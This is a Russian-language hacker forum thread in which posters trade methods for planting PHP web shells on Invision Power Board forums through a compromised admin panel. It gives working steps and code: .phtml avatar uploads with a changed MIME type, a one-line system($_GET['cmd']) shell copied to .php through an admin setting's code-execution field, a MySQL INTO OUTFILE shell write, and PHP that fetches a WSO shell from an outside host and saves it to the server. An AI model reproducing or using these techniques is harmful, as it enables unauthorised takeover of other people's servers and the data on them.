Вроде бы довольно частый вопрос о том, как заливать шелл в ipb 2.0.* и 2.1.*
Ну вот, сразу что пришло в голову, проверить на глупость =))
Разрешить в профиле загружать файлы пхп, пришол облом, они становились файлами notepad =(
Думаю я, думаю, а ведь пхп и пхтмл одно и тоже =))
иду в настройки и пишу в главной конфигурации\профиль пользователей\аватары в конце ,pthml
После иду в атачи и делаю там еще один тип - .phtml
mime тип пишем от пхп файлов, то есть application/octet-stream
ок. разрешаем. идем в профиль, грузим аватар, смотрим к нему путь - и там наш шел, av-1.phtml =))
ВОт и все.

Не дурно =).

Green_Bear
скажи пожалуйста как сделать тоже самое только на версий IPB 1.1.2

Ты попробовал залить его через самайлики ?

Tem
конечно, первое что сделал попытался кинуть шаблон через самайлики но там нету обзора =(

Через шаблоны попробуй ((

пипл, не знаите где найти атачи в IPB v 1.1.2

Такая же проблема, залил в виде phtml, но шелл не запускается а выдает исходник, что делать то?
как запускать, что надо изменить в начале и в конце php чтобы phtml заработал?

Такая же проблема, залил в виде phtml, но шелл не запускается а выдает исходник, что делать то?
как запускать, что надо изменить в начале и в конце php чтобы phtml заработал?

А ты тип файла прописал ?
не расширение а тип файла ?

Да, у меня по этой схеме тоже отрывает исходник.
Странно.

Все зависит от настроек апача.
Видать не прописан phtml там =)

Ребят , пытаюсь через смайлы залить пишет:мона типа тока изображ gif ,jpg и тд ,
пытался через phtml тоже отшило (: как еще залить можно ?

предлагаю ещё способ: заливаем файл .jpg например с таким содержанием

<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').

Папки на сервере должны быть на запись открыты. Этим руководит админ. 2 orex, читай внимательно.

нашел тута еще тему про подмену хттп запроса (: ща попробую разобратся ;)

предлагаю ещё способ: заливаем файл .jpg например с таким содержанием

<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').

Для этого необходимо ещё знать путь к директории с форумом.

Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?

Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?
Незнаю у меня таким методом файл не цыпляется в ачачи и аватары!

Только что проверил. Всё пашет. Михе респект.

Только что проверил. Всё пашет. Михе респект.
А на каком форуме пробывал,может ещё зависит от настройки апачя?

Мужики что делать? Пишет мол фаил с аватором слишком большой? А админка на английском, немогу понять что к чему, помогить плиз пока меня там нафиг неудалили из админки!

Проблема такая!

Имею доступ к админке IPB 2.1.6
но не могу залить шелл ни через атачи (меняет разрешение и PHP не выполняется наверно потомучто в папку upload)

также немогу через смайлы =( нет доступа

Какие есть еще варианты залить шелл??

Можно через мускуль...

к примеру:

CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`
DROP TABLE `ibf_shell`

Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.

Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.

3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads

3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
ТЫ что чушь гонишь? Я тебе про аватары написал ДЛЯ 2.1.6. причём тут папка uploads?? Шелл грузиться в аватары + расширенеи надо .phtml. Вообщем в посте выше я всё описал. Читать надо внимательней.

имеется IP.Board v2.3.5
но не могу залить шелл через атачи
также немогу через смайлы
пробывал через стили, тоже не выходит
может кто знает есчо способ??

navigat0r там возможно произвольное выполнение php кода , когда добовляеш системную настройку.
Воть нашол у себя, думаю должен понять ;)
http://depositfiles.com/files/17mnmm05v

делал также как и в видео, мне пишет что страница не найдена.МОжет оно в другое место сохранило?Как узнать куда сохраняет?
$data=implode('',file('http://navigat0r.kilu.de/shell/wso.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);
правильно я написал??

короче в этой админке так не катит.Пробывал в других, работает.Тут наверно куда-то в др место сохраняет.Чё можно есчо придумать?